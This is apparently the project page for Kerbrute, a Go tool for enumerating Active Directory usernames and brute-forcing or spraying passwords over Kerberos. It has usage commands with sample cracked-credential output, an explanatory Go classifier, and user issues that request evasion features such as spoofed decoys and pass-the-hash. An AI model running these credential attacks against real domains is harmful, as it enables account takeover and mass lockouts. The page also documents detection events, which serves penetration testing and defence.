Kerbrute

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

Grab the latest binaries from the releases page to get started.

Background

This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the Heimdal Kerberos client from Linux. I wanted something that didn't require privileges to install a Kerberos client, and when I found the amazing pure Go implementation of Kerberos gokrb5, I decided to finally learn Go and write this.

Bruteforcing Windows passwords with Kerberos is much faster than any other approach I know of, and potentially stealthier, since pre-authentication failures do not trigger the "traditional" event 4625 (An account failed to log on). They are not invisible, though: each wrong guess still increments badPwdCount and, when Kerberos auditing is on, writes event 4771 on the domain controller, so the lockout policy applies exactly as it would for NTLM or LDAP guessing. With Kerberos, you can validate a username or test a login by sending a single UDP datagram to the KDC (Domain Controller).

For more background and information, check out my Troopers 2019 talk, Fun with LDAP and Kerberos (link TBD)

Usage

Kerbrute has four main commands:

  • bruteuser - Bruteforce a single user's password from a wordlist
  • bruteforce - Read username:password combos from a file or stdin and test them
  • passwordspray - Test a single password against a list of users
  • userenum - Enumerate valid domain usernames via Kerberos

A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given, the KDC will be looked up via the domain's DNS SRV records, so the host's resolver must be able to reach the domain's DNS; if it cannot, pass --dc explicitly.

By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option.

Output is logged to stdout, but a log file can be specified with -o.

By default, failures are not logged, but that can be changed with -v.

Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out (the KDC answers KDC_ERR_CLIENT_REVOKED), it will abort all threads to stop locking out any other accounts. Note that Windows returns the same error for disabled and expired accounts, so --safe can also abort on an account that nobody locked.

The help command can be used for more information

$ ./kerbrute -h

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (bc1d606) - 11/15/20 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string          The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int          Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string      The full domain to use (e.g. contoso.com)
      --downgrade          Force downgraded encryption type (arcfour-hmac-md5)
      --hash-file string   File to save AS-REP hashes to (if any captured), otherwise just logged
  -h, --help               help for kerbrute
  -o, --output string      File to write logs to. Optional.
      --safe               Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int        Threads to use (default 10)
  -v, --verbose            Log failures and errors

Use "kerbrute [command] --help" for more information about a command.

User Enumeration

To enumerate usernames, Kerbrute sends AS-REQs (TGT requests) with no pre-authentication data. If the KDC responds with KDC_ERR_C_PRINCIPAL_UNKNOWN, the username does not exist. If instead it responds with KDC_ERR_PREAUTH_REQUIRED, the username exists and Kerbrute moves on. If the account has "Do not require Kerberos preauthentication" set, the KDC returns an AS-REP straight away; its encrypted part can be saved with --hash-file for offline cracking (AS-REP roasting). Because no password is ever tried, nothing counts as a failed logon: badPwdCount is not incremented, no 4771 is written, and no account is locked out. Each probe does generate a Windows event ID 4768 (A Kerberos authentication ticket (TGT) was requested) if Kerberos authentication service auditing is enabled, with result code 0x6 for unknown principals, so a burst of 4768s with 0x6 from one source address is the detection signal for this mode.

root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:28:04 >  Using KDC(s):
2019/03/06 21:28:04 >   pdc01.lab.ropnop.com:88

2019/03/06 21:28:04 >  [+] VALID USERNAME:       [email protected]
2019/03/06 21:28:04 >  [+] VALID USERNAME:       [email protected]
2019/03/06 21:28:04 >  Done! Tested 1001 usernames (2 valid) in 0.425 seconds

Password Spray

With passwordspray, Kerbrute performs a horizontal brute force attack: one password against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: every wrong guess is a failed pre-authentication, so this will increment badPwdCount and can lock out accounts; check the domain's lockout threshold and observation window first, and consider --safe and --delay. It generates event ID 4768 (A Kerberos authentication ticket (TGT) was requested) for guesses that succeed and 4771 (Kerberos pre-authentication failed) for guesses that fail.

root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:37:29 >  Using KDC(s):
2019/03/06 21:37:29 >   pdc01.lab.ropnop.com:88

2019/03/06 21:37:35 >  [+] VALID LOGIN:  [email protected]:Password123
2019/03/06 21:37:37 >  [+] VALID LOGIN:  [email protected]:Password123
2019/03/06 21:37:37 >  Done! Tested 2755 logins (2 successes) in 7.674 seconds

Brute User

This is a traditional bruteforce attack against a single username: every password in the wordlist is tried for that one account. Only run this if you are sure there is no lockout policy, since each wrong guess increments badPwdCount. It generates event ID 4768 (A Kerberos authentication ticket (TGT) was requested) for the successful guess and 4771 (Kerberos pre-authentication failed) for every wrong one.

root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:38:24 >  Using KDC(s):
2019/03/06 21:38:24 >   pdc01.lab.ropnop.com:88

2019/03/06 21:38:27 >  [+] VALID LOGIN:  [email protected]:Summer2017
2019/03/06 21:38:27 >  Done! Tested 1001 logins (1 successes) in 2.711 seconds

Brute Force

This mode simply reads username and password combinations (in the format username:password) from a file or from stdin (pass - as the filename) and tests each with Kerberos pre-authentication. It will skip any blank lines or lines with blank usernames/passwords. Like the other login modes, it counts against lockout thresholds and generates event IDs 4768 (A Kerberos authentication ticket (TGT) was requested) for successes and 4771 (Kerberos pre-authentication failed) for failures.

$ cat combos.lst | ./kerbrute -d lab.ropnop.com bruteforce -

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 05/11/19 - Ronnie Flathers @ropnop

2019/05/11 18:40:56 >  Using KDC(s):
2019/05/11 18:40:56 >   pdc01.lab.ropnop.com:88

2019/05/11 18:40:56 >  [+] VALID LOGIN:  [email protected]:Password1234
2019/05/11 18:40:56 >  Done! Tested 7 logins (1 successes) in 0.114 seconds
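The decision logic behind userenum, passwordspray, bruteuser and bruteforce, written out as an added Go example. This is not kerbrute's own code: the fakeKDC table is constructed lab data rather than captured replies, and askKDC, Spray and the Outcome names are this example's inventions. It shows the three facts the modes above depend on: a bare AS-REQ sorts principals by KRB-ERROR code without a single failed logon; a pre-authenticated AS-REQ answered with KDC_ERR_KEY_EXPIRED or KRB_AP_ERR_SKEW proves the password was right even though no TGT was issued (the two cases the issues further down report as misclassified); and KDC_ERR_CLIENT_REVOKED, which --safe reacts to, is returned for disabled and expired accounts as well as lockouts.

```go
package main

import "fmt"

// Kerberos error codes (RFC 4120, section 7.5.9) the decision logic turns on.
// Code 0 stands for an AS-REP: the KDC issued a ticket instead of a KRB-ERROR.
const (
	KDCErrCPrincipalUnknown = 6  // no such principal
	KDCErrClientRevoked     = 18 // locked out, disabled or expired: Windows uses one code for all three
	KDCErrKeyExpired        = 23 // password expired; only sent after the timestamp decrypted
	KDCErrPreauthFailed     = 24 // timestamp did not decrypt: wrong password
	KDCErrPreauthRequired   = 25 // KDC wants pre-auth, so the principal exists
	KRBAPErrSkew            = 37 // timestamp decrypted but lies outside the allowed skew
)

type Outcome int
const (
	OutcomeUnknownUser Outcome = iota
	OutcomeValidUser          // exists, pre-auth required
	OutcomeValidUserNoPreauth // AS-REP without pre-auth: AS-REP roastable
	OutcomeValidLogin
	OutcomeBadPassword
	OutcomeLockedOrRevoked
	OutcomeOther // e.g. KDC_ERR_ETYPE_NOSUPP (14): retry with another etype, not a failed guess
)

// ClassifyUserEnum reads the reply to an AS-REQ sent without PA-ENC-TIMESTAMP.
// No guess is made, so nothing here increments badPwdCount or writes a 4771.
func ClassifyUserEnum(code int) Outcome {
	switch code {
	case 0:
		return OutcomeValidUserNoPreauth
	case KDCErrPreauthRequired:
		return OutcomeValidUser
	case KDCErrCPrincipalUnknown:
		return OutcomeUnknownUser
	case KDCErrClientRevoked:
		return OutcomeLockedOrRevoked
	}
	return OutcomeOther
}

// ClassifyLogin reads the reply to an AS-REQ pre-authenticated with the candidate password.
// KEY_EXPIRED and SKEW are only reachable after the KDC decrypted the timestamp: the password was right.
func ClassifyLogin(code int) Outcome {
	switch code {
	case 0, KDCErrKeyExpired, KRBAPErrSkew:
		return OutcomeValidLogin
	case KDCErrPreauthFailed:
		return OutcomeBadPassword
	case KDCErrCPrincipalUnknown:
		return OutcomeUnknownUser
	case KDCErrClientRevoked:
		return OutcomeLockedOrRevoked
	}
	return OutcomeOther
}

// fakeKDC is constructed lab data, not captured traffic: per user, the code a KDC would
// return to a bare AS-REQ, then to one pre-authenticated with the sprayed password.
var fakeKDC = map[string][2]int{
	"alice": {KDCErrPreauthRequired, 0},                   // password accepted, TGT issued
	"bob":   {KDCErrPreauthRequired, KDCErrPreauthFailed}, // wrong password
	"carol": {KDCErrPreauthRequired, KDCErrKeyExpired},    // right password, must be changed
	"dave":  {KDCErrClientRevoked, KDCErrClientRevoked},   // locked, disabled or expired
	"erin":  {0, 0},                                       // pre-auth not required
	"grace": {KDCErrPreauthRequired, KRBAPErrSkew},        // right password, our clock is off
}

// askKDC stands in for the AS exchange on port 88; names outside fakeKDC do not exist in the lab domain.
func askKDC(user string, preauth bool) int {
	if codes, ok := fakeKDC[user]; ok {
		if preauth {
			return codes[1]
		}
		return codes[0]
	}
	return KDCErrCPrincipalUnknown
}

// Spray is the passwordspray loop, single-threaded for clarity. safe mirrors --safe: stop at the
// first CLIENT_REVOKED, which also fires for accounts disabled or expired long before the spray.
func Spray(users []string, kdc func(string) int, safe bool) (valid, revoked []string, aborted bool) {
	for _, u := range users {
		switch ClassifyLogin(kdc(u)) {
		case OutcomeValidLogin:
			valid = append(valid, u)
		case OutcomeLockedOrRevoked:
			revoked = append(revoked, u)
			if safe {
				return valid, revoked, true
			}
		}
	}
	return valid, revoked, false
}

func main() {
	users := []string{"alice", "bob", "carol", "dave", "erin", "frank", "grace"}
	valid, revoked, aborted := Spray(users, func(u string) int { return askKDC(u, true) }, true)
	fmt.Println("valid:", valid, "revoked:", revoked, "aborted:", aborted)
}
```

Run it with go run: the safe spray over the table stops at dave with alice and carol confirmed, which is exactly what --safe would do in a domain where dave had merely been disabled, and erin and grace are never tested. Against a real domain the askKDC stub is the AS exchange over UDP/TCP 88 that gokrb5 provides; the classification is the part worth getting right, because treating code 23 or 37 as a failure silently discards a correct password.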

Installing

You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go:

$ go get github.com/ropnop/kerbrute

On Go 1.17 and later, go get no longer builds binaries; use go install github.com/ropnop/kerbrute@latest instead.

With the repository cloned, you can also use the Make file to compile for common architectures:

$ make help
help:            Show this help.
windows:  Make Windows x86 and x64 Binaries
linux:  Make Linux x86 and x64 Binaries
mac:  Make Darwin (Mac) x86 and x64 Binaries
clean:  Delete any binaries
all:  Make Windows, Linux and Mac x86/x64 Binaries

$ make all
Done.
Building for windows amd64..
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
Done.

$ ls dist/
kerbrute_darwin_386        kerbrute_linux_386         kerbrute_windows_386.exe
kerbrute_darwin_amd64      kerbrute_linux_amd64       kerbrute_windows_amd64.exe

Credits

Huge shoutout to jcmturner for his pure Go implementation of KRB5: https://github.com/jcmturner/gokrb5 . An amazing project and very well documented. Couldn't have done any of this without that project.

Shoutout to audibleblink for the suggestion and implementation of the delay option!

kerbrute's People

Contributors

audibleblink, ropnop

kerbrute's Issues

Parsing Flags Incorrectly

Pulling the latest kerbrute version (untagged):
./kerbrute passwordspray --dc -d -output Summer2020.txt valid.txt Summer2020

Error:
You must specify a password to spray with, or --user-as-pass

[Feature Request] Timeout argument.

Awesome tool.
Would love to have a timeout feature, was in a situation where the DC was barely reachable but still up and responding, kerbrute was dropping the passwordspraying attempt after a small window, tried to find a way to make the timeout infinite but could not find it. That would solve my problem and pretty sure will be useful for others.
Cheers.

Password spray attempt increase badPwd counter by 2

Hi,

When using this tool I noticed that the badPwdCount counter increases by 2 on each password spray attempt against a user. Could you please confirm if this is a bug?

I've attached a screenshot which compares the results to cme.

[Feature Request] Socks proxy support

Someone on Twitter mentioned that kerbrute doesn't work with proxychains. Would be cool to add a proxy option to kerbrute (not sure how well it would work, but worth trying).

Expired passwords are treated as failures

Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (23) KDC_ERR_KEY_EXPIRED Password has expired; change password to reset

KRBERR_KEY_EXPIRED should be treated as a success - appears to be that in session/session.go:TestLogin you're treating all errors as failures:
if err != nil {
return false, err
}

I think 23 should be a success? or configurable as success?

KRB_AP_ERR_SKEW treated as login failure

Hey,

I just spent way too much time getting some creds because of this lil error (which is only shown with -v).

2020/04/18 14:57:24 >  [!] XXXXX:XXXXX - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (37) KRB_AP_ERR_SKEW Clock skew too great

As far as I know, this error response only actually happens with a correct password. I think either showing the error (without -v so you can see it in all the noise) or just classifying it as a valid password would be very preferable.

Thancc

Make problem

Hello. I tried make all but I got this message:
What can I do for this problem?
Thanks

@kali]─[/opt/kerbrute]
└──╼ $make all
Done.
Building for windows amd64..
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Building for windows 386..
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Done.
Building for linux amd64...
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Building for linux 386...
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Done.
Building for mac amd64...
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Building for mac 386...
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Done.

[Feature Request] Semi-Safe mode

Extend the safe mode in a new semi-safe mode to abort after N account lockouts. Essentially, don't abort after the first lockout (probably not our fault), but instead after some user supplied number (probably our fault).

This is primarily for password sprays, but couldn't hurt to have globally.

[feature request] decoy

hey there,
first of all, thanks for this great tool
I'm a red team guy and I use this tool to measure the blueteam response.
I wonder if it would be possible to add decoy mode, in other words, send spoofed ip requests like nmap does.

Thanks!

Error ensure resolv.conf

kerbrute userenum --dc=192.168.10.2 -d=tester.local /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -v | grep 'VALID'

[-] Error: [Error Connection error (192.168.10.2:88)] [Error110] Connection timed out, ensure /etc/resolv.conf points to correct DC

Error execution

Hello,

when I run kerbrute userenum I have this error:

kerbrute userenum   -domain domain1.local -dc DC.domain1.local -users /usr/share/wordlists/kerberos-A-Z.Surnames.txt

kerbrute: error: unrecognized arguments: userenum

I don't understand this error, Can anyone help me ?

A greeting and thanks

Expired accounts are reported as locked out

I noticed that a lot of accounts are reported as locked out, which isn't really possible with a lockout duration of 30 minutes. I checked a few accounts and noticed that they have expired months or years ago. This makes the use of --safe pretty pointless. I guess the Kerberos error code ERR_CLIENT_REVOKED doesn't really tell us why the credentials have been revoked, so there is not much that can be done about this. But it could be mentioned in the console output that account isn't necessarily locked, but could also be expired (or possibly disabled?).

panic: runtime error: invalid memory address or nil pointer dereference

Hi, i have an issue running kerbrute, here is my output

└─$ ./kerbrute userenum --dc 10.10.190.154 -d spookysec.local ~/userlist.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.0 (191510e) - 03/16/23 - Ronnie Flathers @ropnop

2023/03/16 13:52:24 > Using KDC(s):
2023/03/16 13:52:24 > 10.10.190.154:88

2023/03/16 13:52:24 > [+] VALID USERNAME: [email protected]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6849d9]

goroutine 24 [running]:
github.com/ropnop/kerbrute/session.KerbruteSession.HandleKerbError(0x7ffd2e0162a6, 0xf, 0xc0000c0500, 0xf, 0xc0001da540, 0xc0000be100, 0x80, 0xc00013a000, 0x0, 0x0, ...)
/go/src/github.com/ropnop/kerbrute/session/session.go:110 +0x29
github.com/ropnop/kerbrute/cmd.testUsername(0x780160, 0xc0000c81c0, 0xc0000154b0, 0x9)
/go/src/github.com/ropnop/kerbrute/cmd/worker.go:84 +0x2ca
github.com/ropnop/kerbrute/cmd.makeEnumWorker(0x780160, 0xc0000c81c0, 0xc000266000, 0xc0000c0c90)
/go/src/github.com/ropnop/kerbrute/cmd/worker.go:50 +0x14a
created by github.com/ropnop/kerbrute/cmd.userEnum
/go/src/github.com/ropnop/kerbrute/cmd/userenum.go:46 +0x17c

Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated

I know this error was posted before but i can't seem to figure out how to fix it.
When trying to userenum (I'm doing the Attacking Kerberos Room on THM atm) it doesn't work so I tried -v to see what was going on.
For every single user checked it gave me this error message: "[Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated"
I don't know how to fix it.
Here might be some steps on how to replicate it (I'm using a Kali Linux VM):
Download kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
./kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt

Edit: Only workaround i found was editing /etc/hosts with "ip CONTROLLER.local"

ARM version?

I've got a Mac M1 so could we get an ARM version of this?

Kerbrute erroring out on some accounts

Receiving the following error on some specific accounts when password spraying - believe this may point towards some protection in client environment, but haven't yet confirmed.

[Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type

Would it be possible to have the script skip this error, try a different (higher-security?) encryption type, or otherwise log the accounts as being in a different state, and proceed with the rest of the spray?

Scan for user=password

Every onsite pentest I have faced so far, at least a couple of users had been set with username=password.
I think it could be helpful to add to the bruteuser module some kind of username=password.

Error: accepts 1 arg(s), received 2

When using the following syntax: ./kerbrute userenum -dc IPADDR /path/to/text/file

I'm receiving the error mentioned in the title. Did some googling and I can't seem to find anything to resolve what might be causing this problem. Additionally no one has raised an issue related to it yet.

Bug - kerbrute passwordspray

I have a text file with usernames. I supply kerbrute with the usernames and kerbrute will run through a portion and then stop. why is this?
ex - 100 usernames
only 10 usernames are run

kerbrute not working with aarch64

I have kali installed on UTM kali version is
─$ uname -amr
Linux kali 5.16.0-kali1-arm64 #1 SMP Debian 5.16.7-2kali1 (2022-02-10) aarch64 GNU/Linux

1. When running the amd64 ELF file it throws an error.

┌──(kali㉿kali)-[~/Downloads/tools/kerbrute]
└─$ ./kerbrute_linux_amd64
zsh: exec format error: ./kerbrute_linux_amd64

2. When running kerbrute.py it's running fine, but options like userenum don't seem to be in the list.

python3 kerbrute.py -h
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS) [-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
[-dc-ip <ip_address>] [-threads THREADS] [-outputfile OUTPUTFILE] [-outputusers OUTPUTUSERS] [-no-save-ticket]

options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-user USER User to perform bruteforcing
-users USERS File with user per line
-password PASSWORD Password to perform bruteforcing
-passwords PASSWORDS File with password per line
-domain DOMAIN Domain to perform bruteforcing
-dc-ip <ip_address> IP Address of the domain controller
-threads THREADS Number of threads to perform bruteforcing. Default = 1
-outputfile OUTPUTFILE
File to save discovered user:password
-outputusers OUTPUTUSERS
File to save discovered users
-no-save-ticket Do not save retrieved TGTs with correct credentials

Please help, this tool is very essential for me. How can I make kerbrute_amd_64 work on my ARM-based Kali?

Or is there any binary available for ARM?

panic: runtime error: invalid memory address or nil pointer dereference

Hello,
When I use the module userenum, an error is raised when it tries a login with the flag Do not require Kerberos preauthentication set.

Example with only one account with the flag within the list

# ./kerbrute_linux_amd64 userenum --dc 172.16.0.1 -d xxxx.org user 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.0 (191510e) - 03/24/19 - Ronnie Flathers @ropnop

2019/03/24 18:32:04 >  Using KDC(s):
2019/03/24 18:32:04 >  	172.16.0.1:88

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6849d9]

goroutine 15 [running]:
github.com/ropnop/kerbrute/session.KerbruteSession.HandleKerbError(0x7ffc3a555751, 0xa, 0xc000016580, 0xa, 0xc00017e540, 0xc00001c180, 0x70, 0xc0000e0000, 0x0, 0x0, ...)
	/go/src/github.com/ropnop/kerbrute/session/session.go:110 +0x29
github.com/ropnop/kerbrute/cmd.testUsername(0x780160, 0xc000052200, 0xc000016d98, 0x3)
	/go/src/github.com/ropnop/kerbrute/cmd/worker.go:84 +0x2ca
github.com/ropnop/kerbrute/cmd.makeEnumWorker(0x780160, 0xc000052200, 0xc000200060, 0xc000016d80)
	/go/src/github.com/ropnop/kerbrute/cmd/worker.go:50 +0x14a
created by github.com/ropnop/kerbrute/cmd.userEnum
	/go/src/github.com/ropnop/kerbrute/cmd/userenum.go:46 +0x17c

Example with a mixed list (here two accounts)

# ./kerbrute_linux_amd64 userenum --dc 172.16.0.1 -d xxxxx.org user 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.0 (191510e) - 03/24/19 - Ronnie Flathers @ropnop

2019/03/24 17:47:58 >  Using KDC(s):
2019/03/24 17:47:58 >  	172.16.0.1:88

2019/03/24 17:47:58 >  [+] VALID USERNAME:	 [email protected]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6849d9]

goroutine 9 [running]:
github.com/ropnop/kerbrute/session.KerbruteSession.HandleKerbError(0x7ffeea75e751, 0xa, 0xc000016580, 0xa, 0xc00017e540, 0xc00001c180, 0x70, 0xc0000e0000, 0x0, 0x0, ...)
	/go/src/github.com/ropnop/kerbrute/session/session.go:110 +0x29
github.com/ropnop/kerbrute/cmd.testUsername(0x780160, 0xc000052200, 0xc000016db0, 0x3)
	/go/src/github.com/ropnop/kerbrute/cmd/worker.go:84 +0x2ca
github.com/ropnop/kerbrute/cmd.makeEnumWorker(0x780160, 0xc000052200, 0xc000200060, 0xc000016d80)
	/go/src/github.com/ropnop/kerbrute/cmd/worker.go:50 +0x14a
created by github.com/ropnop/kerbrute/cmd.userEnum
	/go/src/github.com/ropnop/kerbrute/cmd/userenum.go:46 +0x17c

As you can see, the module works perfectly against "normal" accounts but not with a Do not require Kerberos preauthentication one.

Tested with the release version of Kerbrute against Windows Server 2012R2

facilitating slower enumeration

In your opinion, if one was to implement the ability to go slow, what would your preference be for the interface?

  1. Allow subcommands to also accept one-off entries, then a user can bash loop around kerbrute:
     while read -r name; do
       sleep 5
       kerbrute userenum --dc kdc.site.com -d site.com --username "${name}"
     done < names.txt
  2. Add something like a --delay <seconds> flag:
     kerbrute --delay 5 userenum --dc kdc.site.com -d site.com names.txt
  3. Do nothing and rely on bash trickery:
     while read -r name; do
       sleep 5
       kerbrute userenum --dc kdc.site.com -d site.com <(<<<"${name}")
     done < names.txt

[Feature Request] Pass the Hash Support

It would be nice to have the ability to spray user accounts with NTLM Hashes. The two main use cases I imagine for this is:

  • Pulling an NTLM Hash off a local workstation, then spraying AD to look for password re-use
  • Testing passwords from domain controller backups (old copies of NTDS.DIT).

Currently, this can be done with https://github.com/3gstudent/pyKerbrute, but is an extremely hacky solution using Python2.

Kerbrute running into Encoding Error

Hi!

I'm walking about the attacktive directory room on THM, and in the section about kerbrute, I'm getting these outputs:

root@ip-[redacted]:~# sudo ./kerbrute userenum -v --dc spookysec.local -d spookysec.local userlist.txt -t 10

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/04/21 - Ronnie Flathers @ropnop

2021/12/04 20:06:34 >  Using KDC(s):
2021/12/04 20:06:34 >  	spookysec.local:88

2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
